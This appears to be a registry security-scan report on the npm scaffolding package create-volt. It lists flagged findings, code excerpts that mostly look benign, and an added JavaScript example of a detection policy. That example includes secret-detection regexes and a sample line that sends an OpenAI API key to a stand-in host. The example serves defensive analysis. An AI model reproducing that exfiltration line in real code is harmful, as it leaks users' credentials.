
create-volt@0.56.1

⚠ Under review

Scaffold a new Volt app — no-build, signals-based UI with Socket.io hot reload.

Static Scan Results

scanned 2h ago · by rust-scanner

Static analysis flagged 14 finding(s) at 86.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
High-risk behavior combination matched malicious policy.

Decision evidence

Behavioral surface (public snapshot)

Source: Child Process, Crypto, Dynamic Require, Environment Vars, Filesystem, Network, Shell, WebSocket
Supply chain: High Entropy Strings, Url Strings
Manifest: no manifest risk signals triggered.

Scanned 69 file(s), 636 KB of source. External domains referenced: aistudio.google.com, api.anthropic.com, api.openai.com, cdn.example.com, cdn.jsdelivr.net, console.anthropic.com, example.com, generativelanguage.googleapis.com, nyc3.digitaloceanspaces.com, platform.openai.com, registry.npmjs.org, schema.org, voltjs.com
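The "high-risk behavior combination" policy named in the static reason, as an added example in JavaScript (not the scanner's own code): regex detectors assign a subset of the surface tags listed above, single-tag rules fire on presence, and the two combination rules (env + network, child process + network) consult a shallow data-flow check of what actually reaches outbound request bodies before choosing a severity. The first sample is constructed from the templates/business/server.js excerpts on this page; the second, credential-leaking sample and the secret-name heuristic are assumptions added for contrast.

```javascript
// Added example: a behavior-combination policy with a shallow data-flow
// check. Not the scanner's code; detectors, policy and samples are assumed.
"use strict";

// One source pattern per behavioral-surface tag (subset of the tags above).
const DETECTORS = {
  ChildProcess: /from\s+["']node:child_process["']|require\(["']child_process["']\)/,
  Network: /\bfetch\(|from\s+["']node:http["']/,
  EnvironmentVars: /\bprocess\.env\b|\breadEnvFile\(|["']\.env["']/,
  PackageInstall: /spawnSync\(\s*["'](?:npm|npx|pnpm|yarn)["']/,
  Crypto: /from\s+["']node:crypto["']/,
};

// Env names that look like credentials (assumed heuristic).
const SECRET_NAME = /KEY|TOKEN|SECRET|PASSWORD|PASSWD|CREDENTIAL/i;

// Which tags the source triggers.
function surface(source) {
  return new Set(Object.keys(DETECTORS).filter((tag) => DETECTORS[tag].test(source)));
}

// What reaches outbound request bodies: the argument of every
// `body: JSON.stringify(<expr>)`, reduced to the env names and identifiers it
// references. Deliberately shallow: no nested calls, no aliasing.
function outboundBodyRefs(source) {
  const refs = [];
  const re = /body:\s*JSON\.stringify\(([^)]*)\)/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    const expr = m[1];
    refs.push({
      expr: expr.trim(),
      envNames: [...expr.matchAll(/\benv\.(\w+)/g)].map((x) => x[1]),
      idents: [...expr.matchAll(/\b[A-Za-z_]\w*\b/g)].map((x) => x[0]),
    });
  }
  return refs;
}

// Policy: single-tag rules fire on presence; combination rules consult the
// data flow before choosing a severity.
function evaluate(source) {
  const tags = surface(source);
  const bodies = outboundBodyRefs(source);
  const has = (...t) => t.every((x) => tags.has(x));
  const findings = [];

  if (has("ChildProcess")) findings.push({ name: "Child Process", severity: "High" });
  if (has("PackageInstall")) findings.push({ name: "Runtime Package Install", severity: "High" });

  if (has("EnvironmentVars", "Network")) {
    const envNames = bodies.flatMap((b) => b.envNames);
    const leaked = envNames.filter((n) => SECRET_NAME.test(n));
    findings.push(leaked.length > 0
      ? { name: "Credential Exfiltration", severity: "Critical", evidence: leaked }
      : { name: "Env + Network (review data flow)", severity: "Medium", evidence: envNames });
  }

  if (has("ChildProcess", "Network")) {
    const outputToNetwork = bodies.some((b) => b.idents.some((i) => /^(stdout|stderr|output)$/.test(i)));
    findings.push({ name: "Command Output Exfiltration", severity: outputToNetwork ? "High" : "Low", outputToNetwork });
  }
  return findings;
}

// Constructed from the templates/business/server.js excerpts on this page.
const SAMPLE_SERVER_JS = String.raw`
import http from "node:http";
import fs from "node:fs";
import crypto from "node:crypto";
import { spawn, spawnSync } from "node:child_process";
const ENV_PATH = path.join(__dirname, ".env");
const r = spawnSync("npx", ["--yes", "create-volt@latest", "update"], { cwd: __dirname, encoding: "utf8", shell: process.platform === "win32" });
res.end(JSON.stringify({ ok: r.status === 0, output: ((r.stdout || "") + (r.stderr || "")).slice(-2000) }));
const env = readEnvFile();
const base = (env.VOLT_AI_GATEWAY || "https://voltjs.com/api/ai").replace(/\/api\/ai\/?$/, "");
fetch(base + "/api/register", { method: "POST", headers: { "content-type": "application/json" }, body: JSON.stringify({ app: env.SITE_NAME || "volt-app" }) })
`;

// Assumed counter-example: the same shape, but a credential reaches the body.
const LEAKY_SAMPLE = String.raw`
import { spawnSync } from "node:child_process";
const env = readEnvFile();
fetch("https://example.com/api/register", { method: "POST", body: JSON.stringify({ key: process.env.OPENAI_API_KEY, app: env.SITE_NAME }) })
`;

console.log(JSON.stringify(evaluate(SAMPLE_SERVER_JS), null, 2));
```

Run over the page's own excerpt, the env + network combination is reported as a review item with `SITE_NAME` as the only env value reaching the body, and the command output is found to go to the local HTTP response rather than to the `fetch`; the assumed leaky sample produces the Critical rating because a credential-looking env name reaches the outbound body. A production scanner would do this on an AST with alias tracking; the point of the example is that the combination alone is what the matched policy keys on.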

Source & flagged code

7 flagged

index.js
L12: import path from "node:path";
L13: import { spawnSync } from "node:child_process";
L14: import { fileURLToPath } from "node:url";
High
Child Process

Package source references child process execution.

index.js · L12 (view on unpkg)
L12: import path from "node:path";
L13: import { spawnSync } from "node:child_process";
L14: import { fileURLToPath } from "node:url";
...
L17:
L18: const __dirname = path.dirname(fileURLToPath(import.meta.url));
L19: const require = createRequire(import.meta.url);
L20: const pkg = require("./package.json");
L21:
L22: // --- tiny ANSI helpers (no deps; degrade to plain text when not a TTY) ---
L23: const tty = process.stdout.isTTY;
L24: const c = (code) => (s) => (tty ? `\x1b[${code}m${s}\x1b[0m` : String(s));
...
L116: " // a tiny example API",
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks. The only such check in the excerpt shown is `process.stdout.isTTY` (L23), which gates ANSI colouring of CLI output, not any network, credential or execution path; confirm the match against the lines not excerpted here before treating this as evasion.

index.js · L12 (view on unpkg)
L4: // npm create volt@latest my-app
L5: // npx create-volt my-app
L6: // npm create volt@latest my-app -- --skip-install
...
L12: import path from "node:path";
L13: import { spawnSync } from "node:child_process";
L14: import { fileURLToPath } from "node:url";
High
Runtime Package Install

Package source invokes a package manager install command at runtime. For a scaffolding CLI that is its documented purpose (the usage comment at L4-L6 shows a `--skip-install` flag). Note also that templates/business/server.js L354 runs `npx --yes create-volt@latest update` from the generated app's config page, which resolves and executes the latest published version of this package at runtime rather than the version originally installed.

index.js · L4 (view on unpkg)
addons/pages/files/lib/pages.js
L146: if (fs.existsSync(bundled)) {
L147: const t = wrap(await import(freshUrl(bundled)));
L148: if (t) return t;
Medium
Dynamic Require

Package source references dynamic require/import behavior.

addons/pages/files/lib/pages.js · L146 (view on unpkg)
templates/business/server.js
L4: // config page: tick add-ons, fill settings, Apply. Apply writes .env (a
L5: // VOLT_ADDONS list + settings) and adds any needed packages to package.json,
L6: // runs npm install, then starts the app — which wires whatever .env enables.
...
L10:
L11: import http from "node:http";
L12: import fs from "node:fs";
...
L14: import crypto from "node:crypto";
L15: import { spawn, spawnSync } from "node:child_process";
L16: import { fileURLToPath, pathToFileURL } from "node:url";
...
L20:
L21: const __dirname = path.dirname(fileURLToPath(import.meta.url));
L22: const ENV_PATH = path.join(__dirname, ".env");
Critical
Credential Exfiltration

Source appears to send environment or credential material to an external endpoint. In the server.js excerpt at L365-367, the outbound POST goes to `/api/register` on the host taken from `VOLT_AI_GATEWAY` in `.env` (default `https://voltjs.com`), and its body carries only `SITE_NAME`; no key, token or other credential appears in the lines shown. The lines excerpted here do not by themselves substantiate credential exfiltration, so check the rest of server.js for what else is read from `.env` and sent before acting on the Critical rating.

templates/business/server.js · L4 (view on unpkg)
L353: try {
L354: const r = spawnSync("npx", ["--yes", "create-volt@latest", "update"], { cwd: __dirname, encoding: "utf8", shell: process.platform === "win32" });
L355: res.end(JSON.stringify({ ok: r.status === 0, output: ((r.stdout || "") + (r.stderr || "")).slice(-2000) }));
L356: } catch (e) {
...
L365: const env = readEnvFile();
L366: const base = (env.VOLT_AI_GATEWAY || "https://voltjs.com/api/ai").replace(/\/api\/ai\/?$/, "");
L367: fetch(base + "/api/register", { method: "POST", headers: { "content-type": "application/json" }, body: JSON.stringify({ app: env.SITE_NAME || "volt-app" }) })
High
Command Output Exfiltration

Source combines command execution, command-output handling, and outbound requests; review data flow before blocking. In the excerpt, the combined stdout/stderr of `npx --yes create-volt@latest update` (L354-355) is written to the local HTTP response of the config page, while the outbound `fetch` at L367 carries only `SITE_NAME`; the command output does not reach the network call in the lines shown.

templates/business/server.js · L353 (view on unpkg)
(excerpt: templates/business/server.js L4-L22, as shown above)
Low
Weak Crypto

Package source references weak cryptographic algorithms. The excerpt shows only `import crypto from "node:crypto"` (L14); the algorithm the rule matched is not in the lines shown, so check the `crypto` call sites before weighting this finding.

templates/business/server.js · L4 (view on unpkg)

Findings

1 Critical · 5 High · 4 Medium · 4 Low

Severity  Finding                             File
Critical  Credential Exfiltration             templates/business/server.js
High      Child Process                       index.js
High      Shell
High      Command Output Exfiltration         templates/business/server.js
High      Sandbox Evasion Gated Capability    index.js
High      Runtime Package Install             index.js
Medium    Dynamic Require                     addons/pages/files/lib/pages.js
Medium    Network
Medium    Environment Vars
Medium    Structural Risk Force Deep Review
Low       Weak Crypto                         templates/business/server.js
Low       Filesystem
Low       High Entropy Strings
Low       Url Strings